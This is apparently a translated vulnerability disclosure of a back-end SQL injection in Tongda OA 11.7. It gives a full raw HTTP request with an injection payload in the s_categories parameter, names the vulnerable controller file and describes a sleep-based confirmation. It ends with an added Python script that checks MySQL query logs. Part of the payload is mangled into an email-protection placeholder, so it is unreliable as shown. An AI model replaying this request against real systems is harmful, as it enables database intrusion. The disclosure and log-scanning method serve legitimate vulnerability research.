0Day | Tongda OA 11.7 Has a Back-End SQL Injection Vulnerability




POST /general/appbuilder/web/report/repchart/data HTTP/1.1
UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=
X-ResourceType: xhr
Cookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbef
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 539
x-wvs-id: Acunetix-Deepscan/288
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

data_path=%5B%5D&s_categories="23fd<>select [email protected]!fdf" #)&i_dataset=10&params%5BsearchParams%5D%5B0%5D%5Bid%5D=&params%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212&params%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID&params%5BsearchParams%5D%5B0%5D%5Btype%5D=text&params%5BsearchParams%5D%5B0%5D%5Bvalue%5D=&params%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal&params%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false&params%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep&params%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=



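Proof of vulnerability:

Looking at how MySQL executed the request in the MySQL log file, you can see that the value passed in the s_categories parameter was executed by the database in full, without any filtering. This confirms a MySQL injection vulnerability.

Vulnerable file:

webroot\general\appbuilder\modules\report\controllers\RepChartController.php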


As a test, a sleep function call was injected with the rest of the statement commented out, and it executed successfully.


Discovery approach:

Fuzzing + SQL log keyword matching + code audit
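
The SQL-log keyword matching step, as an added example (not code from the original article): it scans MySQL general query log lines for a test marker and reports whether the marker ended up inside a quoted string literal or in SQL code context, which is the distinction the log evidence above relies on. The marker, table names and log lines are constructed; default sql_mode (backslash escapes enabled) and single-line statements are assumed.

```python
import re

# "<thread id> Query<TAB><statement>" portion of a MySQL general query log line.
ENTRY = re.compile(r"(\d+)\s+(?:Query|Execute)\t(.*)$")

def literal_state_at(sql, offset):
    """Return the quote char of the string literal enclosing sql[offset], or None
    when that position is in SQL code context. Assumes default sql_mode."""
    quote, i = None, 0
    while i < offset:
        ch = sql[i]
        if quote is None:
            if ch in "'\"":
                quote = ch              # a literal opens
        elif ch == "\\":
            i += 1                      # backslash escapes the next character
        elif ch == quote:
            if sql[i + 1:i + 2] == quote:
                i += 1                  # doubled quote is an escaped quote
            else:
                quote = None            # the literal closes
        i += 1
    return quote

def scan_general_log(lines, marker):
    """Return (thread_id, context, statement) per logged statement containing marker.
    context "code" means the marker reached the parser outside any string literal."""
    hits = []
    for line in lines:
        m = ENTRY.search(line.rstrip("\n"))
        if not m or marker not in m.group(2):
            continue
        sql = m.group(2)
        quote = literal_state_at(sql, sql.index(marker))
        hits.append((int(m.group(1)), "code" if quote is None else "literal", sql))
    return hits

# Constructed log lines: the test value x"zq7marker was sent in two parameters.
SAMPLE_LOG = [
    "2020-08-23T03:57:17.100000Z\t   40 Connect\troot@localhost on demo_db",
    "2020-08-23T03:57:17.212000Z\t   41 Query\tSELECT id FROM demo_a WHERE title = 'x\\\"zq7marker'",
    "2020-08-23T03:57:17.305000Z\t   42 Query\tSELECT id FROM demo_b WHERE cat IN (\"x\"zq7marker\")",
    "2020-08-23T03:57:17.400000Z\t   42 Query\tSELECT 1",
]

if __name__ == "__main__":
    for thread_id, context, sql in scan_general_log(SAMPLE_LOG, "zq7marker"):
        print(f"thread={thread_id} context={context} :: {sql}")
```

A "code" hit marks the statement, and therefore the parameter that fed it, as the place to start the source audit and to move to parameterized queries.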


This article was first published on the WeChat public account 黑白天: 0Day | Tongda OA 11.7 Has a Back-End SQL Injection Vulnerability
